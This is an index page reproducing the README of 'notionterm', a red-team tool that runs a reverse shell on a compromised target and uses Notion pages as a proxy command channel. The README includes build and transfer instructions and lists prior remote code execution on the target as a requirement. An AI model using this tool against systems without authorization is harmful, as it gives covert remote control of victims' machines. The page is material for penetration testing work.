Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/ariary/notionterm
🖥️📖 Embed reverse shell in Notion pages
https://github.com/ariary/notionterm
c2c infosec notion notion-api pentest pentest-tool redteam reverse-shell webshell
Last synced: about 1 month ago
JSON representation
🖥️📖 Embed reverse shell in Notion pages
- Host: GitHub
- URL: https://github.com/ariary/notionterm
- Owner: ariary
- License: unlicense
- Created: 2022-05-11T13:53:21.000Z (over 2 years ago)
- Default Branch: main
- Last Pushed: 2023-03-07T15:39:03.000Z (almost 2 years ago)
- Last Synced: 2024-08-03T17:08:59.801Z (5 months ago)
- Topics: c2c, infosec, notion, notion-api, pentest, pentest-tool, redteam, reverse-shell, webshell
- Language: Go
- Homepage:
- Size: 8.13 MB
- Stars: 122
- Watchers: 3
- Forks: 13
- Open Issues: 3
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
- awesome-notion - notionterm - Embed a shell in Notion pages. (Tools)
README
---
![demo](https://github.com/ariary/notionterm/blob/main/img/demo_dark_light.gif)
---
FOR ➕:
- Hiding attacker IP in reverse shell (No direct interaction between attacker and target machine. Notion is used as a proxy hosting the reverse shell)
- Demo/Quick proof insertion within report
- High available and shareable reverse shell (desktop, browser, mobile)
- Encrypted and authenticated remote shell
---
Why? 🤔
The focus was on making something fun while still being usable, but that's not meant to be THE solution for reverse shell in the pentester's arsenalHow? 🤷♂️
Just use notion as usual and launchnotionterm
on target.Requirements 🖊️
- Notion software and API key
- Allowed HTTP communication from the target to the notion domain
- Prior RCE on target
---
roughly inspired by the great idea of OffensiveNotion and notionion!## TL;DR
Learn command and flags is too boring: **Use `wrap-notionterm.sh`**
## Quickstart
### 🏗️ Set-up
1. Create a page and give to the integration API key the permissions to have page write access
2. Build `notionterm` and transfer it on target machine (see [Build](#build))### 👟 Run
There are 3 main ways to run `notionterm`:
"normal" mode
Get terminal, stop/unstop it, etc...
notionterm [flags]
Start the shell with the button widget: turnON
, do you reverse shell stuff, turnOFF
to pause, turnON
to resume etc..."server" mode
Ease notionterm embedding in any page
notionterm --server [flags]
Start a shell session in any page by creating an embed block with URL containing the page id (CTRL+L
to get it):https://[TARGET_URL]/notionterm?url=[NOTION_PAGE_ID]
.
light
mode
Only perform HTTP traffic from target → notion
notionterm light [flags]## Build
As `notionterm` is aimed to be run on target machine it must be built to fit with it.
Thus set env var to fit with the target requirement:
```shell
GOOS=[windows/linux/darwin]
```### Simple build
```shell
git clone https://github.com/ariary/notionterm.git && cd notionterm
GOOS=$GOOS go build notionterm.go
```You will need to set API key and notion page URL using either env var (`NOTION_TOKEN` & `NOTION_PAGE_URL`) or flags (`--token` & `--page-url`)
### "All-inclusive" build
Embed directly the notion integration API token and notion page url in the binary. *⚠️ everybody with access to the binary can retrieved the token. For security reason don't share it and remove it after use.*Set according env var:
```shell
export NOTION_PAGE_URL=[NOTION_PAGE_URL]
export NOTION_TOKEN=[INTEGRATION_NOTION_TOKEN]
```
And build it:
```
git clone https://github.com/ariary/notionterm.git && cd notionterm
./static-build.sh $NOTION_PAGE_URL $NOTION_TOKEN $GOOS
```